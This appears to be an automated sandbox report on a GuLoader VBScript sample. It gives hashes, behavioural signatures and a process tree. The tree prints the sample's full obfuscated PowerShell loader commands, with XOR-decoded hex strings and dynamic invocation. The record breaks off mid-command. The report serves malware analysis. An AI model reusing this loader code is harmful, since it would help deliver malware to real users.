Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    17/03/2023, 07:25

General

  • Target

    834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs

  • Size

    1.4MB

  • MD5

    493f1f295b01e6e965b95e92f154f574

  • SHA1

    8be9c7216f94da9079f4a64c89ec71d7c310f8f8

  • SHA256

    834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54

  • SHA512

    a61460ddad23d35e7a37239d4ae0ec6bb24fbea7495e895878bba911ae8c84c6965537eaeae30456a69d49d96a7ccd8491ecda1b3a2f57d17595ee63e912ff80

  • SSDEEP

    24576:li8jvyzEb8BK0qlSx58jfpF2sv/4hRu3gqX4Tw4:I8Db8fmxF2MmRs4

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Laryngologi = """ FLu n c tFi oRn OB eft a t e snt eArHn ecsE4A1S0 {W T d epBa r a m (T[TS t rMi nRg ] `$IR y ait pEpGe s ) ;M A S `$Sm yZzooTn t eJss =U TNMe w -BOnbBj e cDtQ Pb yAtTeT[A]P R(T`$HRGyNaStIpupFeSs . LNe n g tOh P/A 2B)K;M q R CFUoAr ( `$ON eNdssIi vSn iOnRg s a n lVges =S0A;R `$SN eVdHsFiUvPnSi nSg sAa n lAg sT - l tT S`$JRhy aDtdp pAeGsm.HL eDnGgMtChS;O M`$MNSe dLsBiUvKn iEnKgas a nBlRgEs +P= 2U) {S S F`$ P aKsIsTi oFn e r eFd eS = `$DR y aItbp pfeOsA. Snu b sbtPrIiHnHgK(F`$tNBetd sEiSvTn iVnEg sPa nSl gUsI,C S2 )G;B U T B A S`$UmFyLz o n tSeTs [ `$ NReRdNs i vnn i nRgPsYaUnOlPg s / 2S] H=f M[ecFoPntvEeBrMt ]C:E: TIosB yLt e (S`$ P a sDsDi oWn e rMeEdse ,T F1R6 ) ;O U C`$ m y z o nPt eRsM[M`$ NMeCdBs i v n iWn g s aMnJlCg s / 2 ] = K(K`$LmBy z oYn tMeMs [N`$HNLeHdtsSiGvDn i nMg sRa n lOgisT/S2B]A p-Pb xPo r u1 9f0F) ; F F }E P[NSItBrri nCgE]R[ SSyTsBtSeBmA.AT eSx t .REMn cGoHd iRnUg ]E:T:DACSSC I IP.dGwe t S tCrfi nTgK(U`$ m y zFoAnHt eus ) ; } `$BA dUjtu nTcptIlSyW0I=CBPeKt aNtGeFs tPe rCn eKsS4 1 0F C'EE D C 7VC DKCVA D BAD 3 9 0 DIARD 2 DD2 'H; `$ A dejLu nPcIt lRy 1B= B e tRaLtSe set esrpnHe sC4p1U0S 'tF 3AD 7OD DNCFCSD 1SC D DI1DDF8 CSAA9D0 EH9 D 7FD 0O8 D 8 CP9 0TE B Db0PCOD DsFLD 8VDABCFS0 DBFLCcAvD 7JC 8MD B F 3SD BSC AHD 6NDM1KDHA CTDS' ; `$FA d j u nAcBtAl yG2 =PBOeKtAa t eBsCtEe rCnHe sg4 1S0 G'UFS9 D B C AFEnEsC CGD 1LDLDRFbFRDAACDAA CYC DCB C D CLD ' ; `$BAFd jBuMn c tTl yS3 =SBDeAtFa t e s t e r n e sP4R1T0H M'REIDSC 7 C DCC A D BTDF3S9N0PEACaC B D 0SCPAGDY7 DS3 D B 9 0 FS7TDJ0DC A DABWC C DK1HCSEEE DTD BHCACFCM8BDT7TDAD DCBPC Dg9n0AFB6BD F D 0 D A D 2 DWBBE CTDABBDB8K'N; `$PA d jiuSnTc t lTyI4 = B e tsa tAeCsotFeTr nIeIs 4 1B0A I' C DNC AECaCGDS7 D 0 DN9B' ; `$ AUd jAuDnNcKtSl y 5 = BEe tFa t e sMt e r n e s 4 1H0E N'KFS9fDtB CIA F 3 D 1 D AYC B DF2wDtBUF 6 D FCDG0DD AIDR2PDHB 'G;S`$MATd jTu n cutFl yS6M=RBIe t aFtHe sFtGeRr nDedsO4S1T0B 'BEHC ENASE D COE DRBFD D D 7 D FCDS2UFS0 DTF DS3JD B 9 2E9tE F 6BD 7KDFABD BVFCCDCC7HE D D 7TDU9M9 2 9HE E ENCGBUD C D 2LDF7YD D 'T;S`$VA dRjMu nTcHtal yB7 = Boe t a tMeRs tie rFn eMsA4V1 0O I'KE CMC BSD 0 CAA D 7 DR3 DaBK9 2C9 EEFT3aDTF D 0lDSFADM9FD BADMA 'S; `$YA dPj uSnTc tSl y 8 =TBJe tNaBtHe slt eWrEnIe s 4 1C0 'PEfCDDSB Dm8RDS2SDTB DAD CKA D B DFAAFGA DKBTD 2IDPBUDS9AD FHCRA DABF'U; `$ AGdKj u nac tBl y 9P=rBVeCtEa tCeTsEtMe rInReHs 4 1v0 E'bFD7 D 0 Fw3DDFB DE3 D 1AC C C 7HF 3ODP1MDIA COBIDG2 DFB 'T;S`$ FToBrMuSd iBnAd tCaEgBeBtu0P= BRe t a tReRsUt e r n e sT4M1j0N U' F 3UC 7 F A DKBSDM2ND B DY9LD FSCpAJD BIE A CP7SCPEFDSB ' ; `$ FSoCrFuBd iCnDdStMaIg eBtM1T=FB e tTa tAeRs t eErKnDeis 4G1 0a H' F DSD 2 DFF CMD CVD 9C2C9vESE ESCUB D ChDE2KDn7 D DI9S2 9 ErEND DGBPD FADK2 DUBCDCA 9N2 9HEAFNFUD 0HCRDTDV7HFVDCD 2UD FKCHDACCDA9O2Z9 E F FaCPBTCEAMDH1 FGDSDD2 DCF CID CRDt'R;T`$ FSo r uAdsi n d tOa gMeEtR2R=sB eTt a tKeUsSt e r naeAsF4 1B0 A'dFK7CD 0 C 8 D 1 DS5IDHBS' ;V`$TFMoBrFu dTi n d tIaog e t 3O= B e tSaFtPets tDeBrBn e sT4S1G0S O' EREDC BKD CTDR2DD 7eDHDS9 2 9PESFA6 D 7TDdA D B FACCCp7 E DRDS7hDt9S9T2L9SE FU0dD BSCs9SE D D 2KD 1 C A 9 2K9 E E 8EDV7 CACEC AVC BOD FCDN2R' ; `$ FSoIrJuGdDiVnUdGtBa gKeKtM4 = B eKtba tNeSsStGeErRn e si4d1R0H S'AES8ADM7 CECAC A CNBNDMFODF2 FdFCD 2 D 2 DD1KD DF'I;R`$ F oUrdu d iUnQd tTaTg eSt 5B=MBMe ttaMtOeDsst e r n eDsV4o1 0 'PDs0 C AzD A D 2 DT2P'j;E`$FFPoKrCuOd iAnTdAtUaPg eTtP6s= BSest a tIe s tEe rAn etsS4R1 0 b'BF 0FC A EfE CBCpDP1DC A D B D D CPANEM8 DR7 CfC CDAFC BHD FND 2HFP3 DNBED 3WDG1OC CPC 7P'C; `$IFRoKr u dUiDnBdmtHaOg ePtI7p= BNe t aCtVeLs tJe rUn eIsP4P1K0 ' FL7SFTBPEB6 ' ;B`$IFAo rSuad iSnBd t a gBe tA8 = BteFt aAtFe s tHe rTnFeTsv4B1D0C G' Er2 ' ;G`$ O v err c h a nnnFePlE=FB e tLaKt ePs t eMrSn e sB4u1 0 'AE BDE D FEB E CE8 D 8ECS'D;U`$ SAo v sdeLsekLeSe n = BWe tSa t eTs tCeKr n e sG4 1P0D L' FSD DTFHDF2SDF2TEF9BD 7GD 0TD ACDE1OC 9SELEVC C D 1SDRD FUF ' ;FfUu nHcLt i o nB Df kHpA R{DP aArtagmS h(S`$ SUkJoKlCe mIe sFtJeRr eerVeArA6 8F,D R`$SSHkBiBd eKrSiBk )B C M B H;M`$ JTuTdDiPc ajtUiKv eL0 = B e t a tBe sFtFeKrJnMeFsa4 1v0 U'H9 A F 7 D A CSCDD 7BDG8 CUA CTD C ATC A DABKD 2CCPD DSBSDS0p8CFH8D7 8CAR9 EI8 3t9 E 9 6IEF5SF F C E CVERFCA DC1 D 3 DTF DM7FDD0SE 3R8S4 8 4 FND CSB C COCGCDDUBEDD0SC AMFFAADA1 DL3 DdFRDz7 Dh0 9 0SF 9 DGB C ANFrFkC DbCPDIDTB D 3 D CFD 2FDs7BDLBACWD 9B6R9I7 9 E CP2H9DE E 9DD 6 D B CECKDcB 9E3VFb1SD C DA4SDAB DFD CHA 9 EAC 5 9 EB9TABEE1 9R0 FA9 DT2 DO1 DDCSD FTDk2FFPFFCBD CADED B D 3 DLCFDb2PCA7LFSD DFFUDLD D 6MDSBP9 EB9 3AF F D 0 DMAA9NEP9CA E 1 9U0PF 2RDS1SDUDMDdFSCSADDF7PDR1CD 0R9M0SE DAC ETDB2BD 7 CBAP9 6H9CAMF 8RDG1 C CVCTBFD ACD 7PDA0MDOASC ASDSF DR9 DEBmC AP8 6C9N7aE 5S9 3B8AFME 3s9C0CFNBLCKFgCMB DWFiD 2 CPD 9T6 9KA F FPD A DF4 C BHDF0JDODUCPA D 2DCC7J8 E 9B7 9 EEC 3 9a7S9V0 FS9 DSBOC A ESA C 7CCOEODOB 9 6 9 A FSF D A DT4TCBBBD 0DD DCCoA D 2TC 7 8UF 9 7K'T;d&V(O`$TFAoSr usd iOnRdStCaIg e t 7B)R G`$ J uTdJiZcNa t i vOeM0O; `$FJPu d iecSaPtUi v e 5 B= ABKeFt aJtDe s t eSrAnSeRsF4B1S0 F'o9BA FaD DH1nDR0 CDAUD FADA7KDK0MDRBSC C D 6 D FFCC8 DO0 D BR9AE 8H3 9 ES9SADF 7 D ASC C DT7BDj8SC APCvDUCUA CAA DBB DA2AC D DBBMDA0E8BF 8D7G8PAU9 0MF 9 D B CSAMF 3HDAB CSA DG6DDH1 DTA 9M6A9PA FYFHDuAFDM4 CEBBD 0tD DECVATDO2 C 7S8AC 9O2 9NEKER5DEUAECS7 CZERD BBEM5 E 3SEN3 9BE FKEF9 6I9 ADFNFsD AMD 4 C BUDL0 D DHCMA Ds2XCM7F8 D 9P2 9KEB9 A FVF DSAIDU4ECBBaD 0LDSDACPAIDP2HCi7H8 AL9C7r9F7D' ;n& ( `$ FToUr uKdLiAn dBt a g eAt 7G) `$DJRuSdAi cBa t i vse 5G; `$TJTu d iPc aItEiEvMe 1n S= UBgeft aTt eTsUt eGr nFe s 4I1B0b T' CSC DRBTCFAACFBSCFC DA0F9GE 9AA FND DF1ED 0HC A D F DA7PD 0UD B CICsD 6 D FPC 8HDS0WD BS9H0 Fn7 DB0HCE8ND 1HDB5BDABk9 6B9NAWD 0 CABPDm2 DW2D9T2 9UEPFDE 9 6PEP5vEUDLCI7ECSDPC ASD B DU3C9S0 ELCECDB D 0TC A DF7fD 3FDPBS9S0AF 7 DF0 CBA DRBrCQCFD 1 CTEDEaD DBBACHC C 8BDN7 DNDsD BCCLD 9 0BFS6 DFFTDO0 DBABDR2 DABCE C DNB D 8 Es3 9 6SF 0UD BHCA9 9D3PFH1 D C D 4 D BUDRDCCGAP9 E EFDSCP7TC D C AFDGBBDE3K9A0IE C C BDDC0VC ANDH7TDO3 DWB 9S0EF 7 D 0DCCA DkB CrCUD 1uC E ECD D BTC C CR8 DD7tD DFDGBMCID 9l0rFT6BDTFAD 0SD AODF2 D BTENCCDSBPD 8B9 6E9G6OF 0SD BBCO9s9 3VF 1 D CSDP4FD B DTDBC AZ9RE FA7CD 0 C A EAERC A CLCS9J7h9I2 9 Eb9 6F9BAPF 7SD ARCMCuDC7 DR8FCPAsCSDhCBAOC A D BRDu2 CLD DPBSDD0 8 FN8 7s8 AE9B0NFP9pDMBECPAOFG3 D BHCHArD 6 D 1 D AG9b6D9ZAJFOFCDAA DS4ICBBTDF0SDUD CBAHDJ2 CJ7R8UBO9p7 9 7E9 0 FT7rD 0 C 8CD 1sD 5 D B 9V6 9NAFD 0PC BLDK2JD 2B9 2F9 EMF E 9N6P9 ATERD DS5 D 1 DA2DDDBOD 3 DIB C DACNA DPBFCUCFDPBECOCLD B CLCF8 8 8S6T9U7P9C7L9 7I9K7S9T2P9 E 9UA EVDKDS5 DM7SD ADD BTCOCEDS7ODL5 9D7 9B7F' ; & (F`$ FSo rAuCdCi n dwt a gSeDt 7 ) `$ JuuPdSi c a tNiSvGe 1F;K}Mf uUnOcNtIiIo n SG D T A{ PFaar aTmU H( [PPTacrPaWm eGtNeMr (SP o sDi t iEo n S= S0P,M NM a nUdDa t oOr y U= T`$ TTr utep)V]H M[ T y pPe [ ]O]a `$RUBnSp r i nbcPi pAl ePd lUy 1 8 ,C[UPTa rSa mFeSt e r (RPSoSs i t igoRn I= L1R) ] k[sTTyLp e ]R F`$ A lDfHa rPyLtDm e F=S B[FV o iTd ] )G;m`$NJ uTdOiEcEaTtCiHvPea2 K=D B eKt a tNess tHekrSnReHs 4A1 0P ' 9 AGDU0 C BTDP1BCB8SD 1S9DEE8S3C9 E EU5 F F CBESCFEKF A DS1KDB3FDDFgDH7 D 0rE 3K8S4B8P4 FHDHC B CFC CRCFD BFD 0 C A FbASDJ1PDS3 DEF D 7ADS0T9 0BFSA D BFD 8UD 7TDB0 DCBKF A CE7 D 0SD F DJ3 DF7 DLDCFUFAC D CMDCDEB D 3 D CGDV2DC 7 9M6G9a6OF 0UDRBaCL9 9 3IF 1 D CADT4SD BUDSDMC A 9 ERE D CL7 CPDAC ASDbBPD 3 9 0ME CRDWBEDD8GDO2UDTB DDDKCTASD 7BDF1 DC0 9 0DF FECNDSCFD DCB DR3ED C D 2aC 7MFP0KDFFSDK3 DtB 9 6 9 ASFGF D A DU4 CCB D 0SDTDBC A DA2 C 7D8 6 9 7 9 7B9 2 9PE E 5 EED CU7 CRD CbApD BPDG3P9 0oEBCRDvBADS8 DB2 DUBUD DMCKA D 7CD 1VD 0 9b0 FDBCD 3PD 7 C A 9 0SFSFOCAD C DMDPBEDF3 DFCLDI2BC 7TF C C B D 7 D 2 DJA D BUCDCDFKFEDAD DSDKDABRC DLCODAEC3S8 4K8 4 E C CPBPD 0n9B7O9A0 FAAHD BTDY8 DL7SDN0BDUBGFCANCO7LD 0BDSF Da3FDb7 DSDRFw3MDK1 DMA CUBQDC2 D BS9 6S9 ASF FRD A D 4 C BMD 0FD DGCNA DM2BC 7 8K7 9s2M9NEt9 ATDB8 D F DG2CCAD DSB 9 7H9J0FFIA D B D 8 D 7 D 0DDBBuEMA CB7OC EVD BL9A6 9 A F 8HDE1ACSC CCB DCAFDK7 DM0 DTAuCsAKDCF DD9HDKB C AC8 ES9A2K9PEV9 APFK8ODB1aC CCC BPD ATDS7PD 0UDTATCPAJD F DT9 DLBBCLAP8 FA9 2 9IEFES5AE DUCU7 CPD C A DUBBDT3 9 0NF 3 C BPD 2 CDABD 7 DjDDD F C D CKA FPATDUB DH2RDVB D 9ADHFTCPAPDSBUEF3S9 7P' ; & (F`$ F oOrpu d iPnBdEtBaOg e tA7u) L`$ JUuAdMi c aOt i v eS2U;H`$ JMuSdIiNcka t iLvUeL3T =P BBMeCtRaBt ensBtAeVrSnDeKs 4N1P0 A' 9 A D 0 CSB Da1 CF8BD 1E9B0TFBAFDBB D 8UDT7FDG0NDDBaFFD DC1bDC0TCHDDC ASC CECSB D DLCoA DS1FC Ca9 6F9 AUFBF DDADDC4RCFB D 0CD DPCMAGDt2CC 7 8S8t9U2 9bE EH5NE D C 7BCUDLCLAMD B DO3 9B0 ESCHDFBBD 8 DF2 DBBWD DTC APDt7ADA1BDH0H9 0 FSDDDKF D 2 DW2AD 7 D 0TD 9BFBD D 1FD 0LC 8uDBBCD 0MCDASDK7pDS1 DO0PCSD ES3 8F4h8R4MEWDTCOADDCFDDL0UD A DNFTCBC D AU9 2c9PEP9 AaEUBED 0 CUEUC C D 7PDN0 DDD DI7sC EPD 2DD B DHAFD 2CCP7 8RF 8 6 9 7T9 0 ESDEDRB C AKFA7AD 3TCPE DS2DDBBSDS3 DDBSD 0 CIA D FFC AADN7uDa1 D 0 F 8 D 2TDHFRD 9 CBD 9j6 9CA FSFLDPASDB4FCDB DK0 DSD C A DU2 CT7M8P9G9O7 'G;P&G( `$CFUofrBuSdAi nFd t aFgbe t 7U) B`$ JCuGd iUcAadtOi vKe 3F;O`$PJMu d iPc a tViSv eK4S A= BCeutMaMtTeFsAtAe r nAePsA4U1 0S B' 9AASDS0ACCB D 1pC 8 D 1S9R0MF AFDBB D 8 D 7ODN0TD BRFR3 DGBFCNAPDU6HDT1 DTAS9P6 9 AFF 8bD 1FC C C BBDTABD 7 D 0MDcAWCOA D FTDF9 DtBNChA 8WCI9F2D9 EA9ZA F 8ED 1UCAC C BFDAA Da7SD 0BDVAWCAA D F DS9BD BpCBAJ8 DF9 2U9 EP9DA F F D 2OD 8 DbFUC CICB7 CLATD 3UD B 9 2K9SE 9cA E BSD 0GC E CEC D 7CD 0UDOD D 7SCSEMD 2 DFB D ASDE2DCF7d8TF 8 6G9 7B9 0FEVDWDSB C ASF 7SDP3 CFERD 2 DSBbD 3MDCBFDF0UCEAVDRFOC ARD 7 DM1ADC0SF 8rDS2UDTFUDS9KC D 9 6s9SAFFAF DGARD 4SCNB DU0 DFDUC A DA2LC 7C8 9 9 7 'K;O& (M`$PFFo rBuSd iAn d tVaAgPeDt 7 ) E`$ J u d i cQaotUiTv eS4B;S`$SJpu d i ckaDtRiAvre 5G u= KB e tpastSe sAt e r n eGsB4K1 0 'SC C D B CAA C BSC CKDR0 9SE 9 A DP0 C BIDB1 C 8 D 1 9R0DFSDHCPCUD B D FMCAA D BNEOAIC 7UC EFDVBS9D6 9 7S' ;T&U( `$ FNoIrGuGd i n dUtEa gBe tQ7 )K D`$RJFu d iScCaGtTiCv eO5 D v; } `$ BNiToGgSrBa fLiHeHr nRe H= EBBePt a tKe sSt eBr nWe sS4D1i0A N' D 5 D B C CMDT0DDUBOD 2 8 DF8SC 'S;L`$AJAuMdSiUcTaCt iFvKe 6 B=T oB e t aBtje sktReSrEnMepsN4s1G0 ' 9 APE E C BUDS3TCTE DFBMC CWD 0UDMB C D 9 EN8B3F9 E E 5PEBDGCW7RCpDRCAAOD BADk3N9B0 EKCOCLB DM0 CTAFDU7FDF3 D B 9A0RFC7 DU0TC ATDPB C CHD 1SCAETEVDWD BRC CFC 8TDF7SDUD D B CDDA9K0PFP3MDTF CSCSC D DT6 DNF DH2EE 3 8L4 8 4OFB9 DLB CEAPF A D BAD 2 D B D 9HDUF C A DUBOF 8 DB1BC C F 8FC BGDP0SDADNCMAuD 7 D 1BDU0SE EBD 1FDL7UD 0WCHAMDGB CLC 9 6M9H6 DF8DDF5KC Ea9SEB9GADFCC DR7RD 1DDF9OC CJDAFADT8BDn7JD BuCJC D 0 D BF9 ES9AA F 8HDP1 C C CRB DPAaDc7SD 0GDHASCsA DGF DK9PDDBFCEAN8TAs9V7 9W2 9CEI9 6 FS9 FFAvELAM9IEaF ER9M6 ED5RFS7ADS0PCSA E EHCUADCMC EH3 9 2 9 EOEH5 E B F 7HD 0 CPA 8dDC8KC EU3 9A2 9 E Es5 E BUF 7 Dz0UC A 8NDP8uCAEA3F9 2C9QE E 5 ELBOFU7 DI0DCEA 8 D 8SCDE 3 9G7A9ME 9 6SEU5 F 7LD 0 C AUE E CKAWC CKEG3T9F7M9 7S9 7 ' ; & (F`$IF o rTuIdTiSn dstRaDgCe t 7 ) `$LJ uLdUiIc a t iUv e 6 ;V`$ JDoLsFiUn a =B FfRk pN D`$ FOo rMu dTi nNdUt aAgSe t 5T P`$ FRo rPuBdoiCnHdBt a g eBtT6S; `$fJ u dDiTc aAtGi vUeA7C F=H B e tsaAtTe sstue r nKe sT4 1M0 'R9JABFSC D BUCED D 5 CICGD 7GDI0PDI9 D BAC C 8NDA9 E 8C3A9FEg9 AFE ESCMB DB3PCfEFDfB CSCFD 0 D BNC D 9K0FF 7LD 0OCP8 D 1 DA5HD B 9 6 E 5 F 7 Da0DCFAREGE C A C C EG3 8E4O8 4 EF4 DTB CMCSDG1 9M2 9TEG8 8 8 B 8 E 9m2B9 E 8PEUC 6 8EDU8 EP8 EK8aEA9 2 9DE 8 E CO6 8 AL8 ES9 7d' ; &c( `$ FFoSr u dAiSnSd tCaSgleHtT7P) M`$ J u dNiPc aRtBirvfem7K; `$SJ u dEiSc aEt iTv eM8G =B BCeGtSa tSe sSt e r nTeTs 4 1 0J T'L9FA FNF C BMCPCLDPB DA0JD B 9 E 8G3 9rET9SAHEBE C B DA3DCfEEDMB CSC D 0CDPB CoDU9G0FFA7LD 0HCM8 D 1pDD5 D BT9 6UEP5 F 7bD 0 CSAUEKE CNABCGCPES3E8U4 8 4 E 4 DJB C C D 1H9B2H9 E 8B7f8 D 8 8 8bDG8s6I8 8D8UB 8O8 9L2F9 E 8DE CP6S8DDR8TE 8RE 8 ED9 2F9UEO8 EUCM6 8 AB9W7 ' ;b&T(R`$ F oArSuBdViEnPd tWaIg e tH7 )s `$RJ u d i c aAt iDv eH8U;C`$RBSeDs k r iLnsgEe rP0 0u=K'CH K C U :R\HaUhAo rGnPtTrBe r nEes\USPo lVdBeFbAr oerS'S; `$GB eFsFkFrriTnPgCe r 0C1 = B eCtLaStee sKt e r nSeEsF4 1S0 b'S9 A F FgDS2 CAB D 3TDP0 D BSCkCSC DN8R3 9E6cF 9SDCBOCTAK9D3 F 7 CFA D BDDC3 E EJC C D 1 CdEFDTB C C ClABCb7M9BEI9 3DESEBDaFLC ABD 6 9HEE9PANFFC DKB CFD D 5 C C D 7KDb0HDV9RDSBPC C 8 E 8TE 9F7 9R0 D BFCF6DCFA CBCEDFF CSE DH1UDR2 DBFDC A D BC'O;T& (d`$lF oLrSu d i nEdMt aOgIeAtO7F) A`$ BMe s kbr i nDgbeSrB0 1A;U`$aJOu dPi c a t i vFeR9 =B OBTe tLa tPe s tMeGrNnGeNs 4 1H0C t'S9PACFD4 CPB D APD 7 D D DFFCCRA D 7sCu8 DSBG9BES8F3P9CESEF5SE D CS7VCSDGC AUD BTD 3R9 0 FSD Dg1ED 0SCB8PDuBSCSC CBAVED3 8H4P8K4GF 8SC CCDf1ADS3TF CBDIFGCPDUDSB 8 8 8OA E DPC A C CBD 7 DA0 D 9M9 6g9KA FMFFDR2OCVB DR3 DT0FDIBSCBC CSD 9 7O's;U&T( `$ F o r u dKiSnMdDt aLgEe t 7I)R `$ J ubdUiUcSa tiiIvPeK9 ;S`$OA lAuAmDn eGr s 0K E=O MB ePtPaBtPeSsAt ear nOe sP4G1 0F ' EB5 E DPCI7 CUDLCKA D B DB3V9 0AEBCECSB DB0RC AbDS7EDu3UDIBO9B0 FK7MD 0 CmAADABSCVCcD 1SC E E DTD BPCCCEC 8FDI7EDEDKD BSCBDO9S0KFJ3FDPFSC C CHD D 6 DSFAD 2 E 3C8s4 8P4 FNDZD 1 CsESCb7r9S6 9sAIF 4 CABMDtABDS7 D D DtFCCDATDf7 CS8 DCB 9D2a9tE 8 EU9H2P9LE 9 EM9UATFDC D BFCKD DM5BCLCCD 7fDS0KDT9OD BUC CH8 DT9O2R9BER8I8F8TBI8SE 9 7 'T;s& (T`$EF oBrDuEd i nVdBt aLgOePtT7O)B N`$ AHlBuTmOnFeUrAs 0R;A`$ OBm tAuFmBl e tD=A`$FJSuIdTi cBaOt i vCeL.oc oSuMnOtU- 6d5P0T;F`$EASlMu mFnle rds 1T T=V B e tUa tDeTs t e rDn eFs 4S1 0 'SE 5 E D CS7RCSDSCNAPD BKD 3 9H0BE CMC BUD 0 CSA DI7 D 3 D B 9U0 FL7FDC0TC AWDSB CUCCDH1PC EYEAD D BhC C C 8 D 7 DFDSDRB CGDC9L0 F 3 D FGC CpC DBD 6 DHFTDc2PES3 8T4D8L4MFPD D 1SCKEAC 7U9 6 9SAPF 4 CBBHD ARD 7DDTD D FRC AEDM7 C 8 DAB 9B2m9 E 8 8 8 B 8SEA9D2U9PEI9 AAF FAC B CPC DPB DM0MD B 9R2 9RE 9AABF 1 D 3TCBARCGB Db3 DF2ADsBRCbAU9A7 ' ;T&o(S`$RFBoNrBu dCiTnMd tSa g eBtK7F) `$TA lAuDm nPe rCsO1N;A`$SA lRu menAebr s 2a T=S TBUe tRaEtUe s t eFr nFe s 4S1 0E P'U9 AwF 4UD 1BDT0 DJ7eC D D BMC CAD 7MD 0HDT9 D B CPC 9 E 8 3 9RE E 5TEFDGC 7SCFDGC A D BnDI3B9 0wEIC CTB DP0tCuA DV7SDd3KDSBT9S0UFE7 DP0KCDA DUBSC CNDE1EC E EMDlDUBPCCCOCK8 DU7LD DTD BMC D 9U0CFF3eD F CFC C DRDA6CDtFPD 2 EB3E8 4U8 4DFD9 DuBpCDASF A DbB DK2 D B DA9 D FACAA D B F 8MD 1 C C FH8 CSBHD 0IDDDLCGA DB7 D 1MD 0SE E D 1GD 7 Di0BC AID BCCTCa9B6 9 6DD 8EDU5ECPEZ9EES9HA FP1 CI8VDtBPC CmDGD D 6TDTFRD 0 DT0OD BNDC2F9JEA9WALEUD D 1 C 8NC DJDLB CADADH5BD B D BOD 0S9S7B9 2S9FE 9 6PF 9DF AOE AE9WE FHES9 6 E 5kFC7 D 0ZCTA EEESCUA C C ED3R9 2 9 E EH5PFD7SDE0WC ARE E CFA CRC EN3 9 2D9 EBES5kFE7 DT0vCDAEEOE C AeC CBEt3 9U2L9 E E 5 FL7DDF0GCDA E E CAADCLC E 3 9 2B9BEGE 5IF 7SDI0FCtAFEmEKC AEC CLEC3O9P7S9TEA9D6CE 5OFS7cDI0 CTADEmEnCLANCRCLE 3S9A7E9S7U9 7E' ;S&L( `$SFSo ruuCdUi nldSt aHgPeFtR7 ) u`$ ABl uAm n eOr s 2 ; `$ A lKuAmsnGedrTsP3B O= JBPeFtDaRtDeCsKtBe rWn e sD4 1K0J W'L9 ADF 4 DL1KDC0ED 7 CODDDSBGC C D 7BDL0 DS9GD BpCYC 9D0DFU7 D 0RCB8 D 1RDL5 D B 9 6 9DA FSCADZB CdD DS5 CCCFDF7bD 0 D 9 D BDCVCP8SDn9S2D9UA FUFBCHB CNCHD B D 0 D B 9T2C9NASF 4TDQ1HC DPD 7 D 0KDTF 9 2 8 EW9 2L8SES9V7P'F; &E(C`$TF oSr uDdDi nCdStHaHgOe tR7T)I G`$MA lBuKmFnFeSrBs 3F# ;""";;Function Alumners9 { param([String]$Ryatppes); For($Nedsivningsanlgs=1; $Nedsivningsanlgs -lt $Ryatppes.Length-1; $Nedsivningsanlgs+=(1+1)){ $Betatesternes41 = $Betatesternes41 + $Ryatppes.Substring($Nedsivningsanlgs, 1); } $Betatesternes41;}$Gynecocracy0 = Alumners9 ' F F K a N M T D T B S D S M F S H AIBE XF ';$Gynecocracy1= Alumners9 $Laryngologi;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Gynecocracy1 ;}else{.$Gynecocracy0 $Gynecocracy1;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Betatesternes410 { param([String]$Ryatppes); $myzontes = New-Object byte[] ($Ryatppes.Length / 2); For($Nedsivningsanlgs=0; $Nedsivningsanlgs -lt $Ryatppes.Length; $Nedsivningsanlgs+=2){ $Passionerede = $Ryatppes.Substring($Nedsivningsanlgs, 2); $myzontes[$Nedsivningsanlgs/2] = [convert]::ToByte($Passionerede, 16); $myzontes[$Nedsivningsanlgs/2] = ($myzontes[$Nedsivningsanlgs/2] -bxor 190); } [String][System.Text.Encoding]::ASCII.GetString($myzontes);}$Adjunctly0=Betatesternes410 'EDC7CDCADBD390DAD2D2';$Adjunctly1=Betatesternes410 'F3D7DDCCD1CDD1D8CA90E9D7D08D8C90EBD0CDDFD8DBF0DFCAD7C8DBF3DBCAD6D1DACD';$Adjunctly2=Betatesternes410 'F9DBCAEECCD1DDFFDADACCDBCDCD';$Adjunctly3=Betatesternes410 'EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8';$Adjunctly4=Betatesternes410 'CDCACCD7D0D9';$Adjunctly5=Betatesternes410 